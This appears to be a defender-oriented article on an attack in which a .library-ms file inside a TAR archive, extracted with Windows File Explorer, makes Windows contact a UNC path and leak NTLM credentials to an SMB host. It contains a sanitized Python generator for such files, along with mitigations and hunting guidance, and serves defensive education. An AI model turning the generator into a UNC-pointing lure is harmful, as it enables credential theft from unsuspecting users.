Windows File Explorer Windows 10 Pro x64 - TAR Extraction

Windows File Explorer TAR Extraction and .library-ms UNC Attack — Overview for Defenders

This article explains a Windows-specific abuse pattern where a specially crafted TAR archive containing a .library-ms file can be used to trigger automatic resolution of a UNC path when extracted with Windows File Explorer. The goal here is defensive: explain the concept, identify why it matters, show a safe and sanitized code example, and provide mitigations, hunting strategies, and safe lab testing guidance for incident responders and system administrators.

What is a .library-ms file and why it matters

A .library-ms file is an XML-based descriptor used by Windows Libraries (File Explorer) to point to one or more folder locations. When a .library-ms file references a UNC path (\\server\share), Windows components may attempt to access that network location when the file is opened or when File Explorer processes the file. That network access can cause credential delegation or leak authentication material (e.g., NetNTLMv2 challenge/response) to an external SMB endpoint under certain conditions.

High-level attack concept (defensive description)

• An adversary places a .library-ms file inside an archive (for example, a TAR archive).
• If a user extracts that archive using Windows File Explorer (or otherwise causes the .library-ms file to be loaded by Explorer), the .library-ms content may cause Explorer to resolve a UNC path.
• If the UNC path points to an adversary-controlled host, this can provoke outbound SMB authentication attempts from the victim machine, potentially allowing credential capture or relay depending on environment hardening.

Note: This summary intentionally omits step-by-step exploit instructions. The focus is on detection, mitigation, and safe handling.

Sanitized example: creating a harmless .library-ms file in Python

import os
import tarfile
from xml.sax.saxutils import escape

def make_library_file(filename, local_path):
    # Sanitize path to avoid accidental network references
    safe_path = escape(local_path)
    content = f'''
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>{safe_path}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'''
    with open(filename, "w", encoding="utf-8") as fh:
        fh.write(content)

def make_tar(tarname, files):
    with tarfile.open(tarname, "w") as tarf:
        for f in files:
            tarf.add(f)

if __name__ == "__main__":
    # Example: use a local path only (no UNC //server/share)
    libname = "safe_example.library-ms"
    make_library_file(libname, "file:///C:/Temp")
    make_tar("safe_example.tar", [libname])
    os.remove(libname)

Explanation:

• This sanitized snippet demonstrates how a .library-ms XML file can be programmatically generated and placed into a TAR archive without referencing any network resources. The input is escaped so special characters cannot inject unintended XML or UNC references.
• It uses a local file URI (file:///C:/Temp) to avoid triggering network resolution. This is suitable for demonstration or lab use when you want to observe the archive format without causing network traffic.
• Do not replace the safe local path with a UNC path (\\server\share) unless you are performing isolated, controlled testing in an air-gapped lab according to approved procedures.

Why defenders should care

• Untrusted archives opened in File Explorer can prompt the system to interact with network resources implicitly.
• These implicit outbound SMB interactions may reveal authentication material or enable relay/NTLM abuse in networks without proper protections.
• Attack surface is increased where users routinely open archive attachments or downloads with Explorer rather than a hardened unpacker.

Mitigations and hardening

Recommended defensive controls to reduce risk from this and similar patterns:

• Patch and update: Keep Windows and endpoint protection up to date so known behaviors and fixes are applied.
• Disable unnecessary services: Disable the WebClient service on endpoints that do not require WebDAV; it can reduce automatic network resource resolution in some scenarios.
• Network segmentation and blocking: Block outbound SMB (TCP 445) and related ports to the internet and untrusted networks at the perimeter and host-based firewalls.
• Enforce SMB signing and restrict NTLM: Enable SMB signing and disable NTLM where possible; replace with Kerberos-only authentication to prevent NetNTLM capture usefulness.
• Endpoint controls: Restrict which applications can extract archives, and consider using dedicated, sandboxed archive tools for user-facing extraction.
• Least privilege: Limit local accounts and avoid cached credentials where possible. Avoid using privileged accounts for daily tasks.

Detection and hunting guidance

Signs of this pattern can be found both on endpoints and network sensors:

• Monitor for unexpected outbound SMB connections from user workstations, especially to external or new destinations.
• Look for authentication attempts (NetNTLMv2 challenge/response) originating from user workstations in network captures or from SMB gateways.
• Use endpoint telemetry (Sysmon, EDR) to detect file creation events for .library-ms files in user temp folders or Downloads and suspicious archive extraction activity.
• Correlate Explorer.exe parent/child relationships and archive extraction behaviors with subsequent network connections.

Safe testing and lab recommendations

If you need to reproduce the behavior for analysis, follow strict safe-testing practices:

• Always use an isolated, air-gapped or internally isolated lab environment that is not connected to production or the internet.
• Use private test hosts for SMB targets (e.g., a controlled SMB server you own) and ensure those hosts are instrumented for logging. Do not point to third-party hosts or attacker-controlled infrastructure.
• Use packet captures (Wireshark) and endpoint logging to observe behaviors. Ensure you have authorization to test the systems involved.

How to handle a suspected incident

• Contain: Block outbound SMB from the affected host and isolate it from the network.
• Collect: Preserve relevant logs (EDR, Sysmon, Windows Event logs), the suspicious archive, and network captures showing the SMB negotiation.
• Analyze: Determine whether credentials were successfully delegated, whether the destination host is trusted, and whether lateral movement occurred.
• Remediate: Reset affected credentials, review account usage, and patch/harden systems per the mitigations above.

Summary table — quick reference

Concern	Defensive Action
Implicit UNC resolution via file	Disable WebClient where appropriate; restrict which apps extract archives
Outbound SMB to untrusted hosts	Block SMB egress; network segmentation
NTLM credential capture	Enforce SMB signing; reduce NTLM usage; enforce MFA
Detection gaps	Enable Sysmon/EDR, log file creation (.library-ms), and alert on unusual SMB auth